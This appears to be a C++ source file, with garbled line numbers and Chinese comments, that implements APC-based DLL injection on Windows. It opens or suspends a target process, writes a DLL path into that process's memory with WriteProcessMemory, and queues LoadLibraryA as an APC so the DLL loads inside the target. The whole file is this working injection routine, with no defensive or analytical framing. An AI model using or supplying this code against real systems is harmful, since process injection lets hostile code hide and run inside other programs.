1 #include2 #include 3 #include 4 5 using namespace std; 6 7 /* 8 APC注入条件: 9 目标线程处于可唤醒状态10 如使用以下API时就处于可唤醒状态11 SleepEx, SignalObjectAndWait, WaitForSingleObjectEx, WaitForMultipleObjectsEx,MsgWaitForMultipleObjectsEx12 参数dwPid默认为0,表示自动创建目标进程并立刻生效注入,否则,注入现有目标,等待目标唤醒时执行APC回调13 */14 BOOL APCInject(char *dllUrl,DWORD dwPid=0,char *exeUrl=NULL);15 16 int main(void)17 {18 19 cout << APCInject("c:\\desktop\\test.dll",3980) << endl;20 return 0;21 }22 23 BOOL APCInject(char *dllUrl,DWORD dwPid,char *exeUrl)24 {25 HANDLE hSnap=NULL,hPro=NULL,hThr=NULL;26 BOOL bOk = FALSE;27 LPVOID hVir = NULL;28 THREADENTRY32 te = { 0};29 30 if (!dwPid)31 {32 STARTUPINFO wi = { 0};33 PROCESS_INFORMATION pi = { 0};34 35 wi.cb = sizeof(wi);36 CreateProcessA("c:\\desktop\\123.exe",NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&wi,&pi);37 hPro = pi.hProcess;38 hThr = pi.hThread;39 } else {40 te.dwSize = sizeof(te);41 hPro = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);42 if (!hPro)43 return FALSE;44 hSnap = CreateToolhelp32Snapshot(4,dwPid);45 bOk = Thread32First(hSnap,&te);46 while (bOk)47 {48 if (te.th32OwnerProcessID == dwPid)49 {50 hThr = OpenThread(THREAD_ALL_ACCESS,FALSE,te.th32ThreadID);51 break;52 }53 54 bOk = Thread32Next(hSnap,&te);55 }56 CloseHandle(hSnap);57 }58 59 if (!hThr)60 return FALSE;61 hVir = VirtualAllocEx(hPro,NULL,strlen(dllUrl)+1,MEM_COMMIT,PAGE_READWRITE);62 if (!hVir)63 return FALSE;64 if (!WriteProcessMemory(hPro,hVir,dllUrl,strlen(dllUrl)+1,NULL))65 return FALSE;66 CloseHandle(hPro);67 if (QueueUserAPC((PAPCFUNC)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA"),hThr,(DWORD)hVir))68 {69 if (!dwPid)70 {71 ResumeThread(hThr);72 CloseHandle(hThr);73 }74 return TRUE;75 }76 CloseHandle(hThr);77 return FALSE;78 }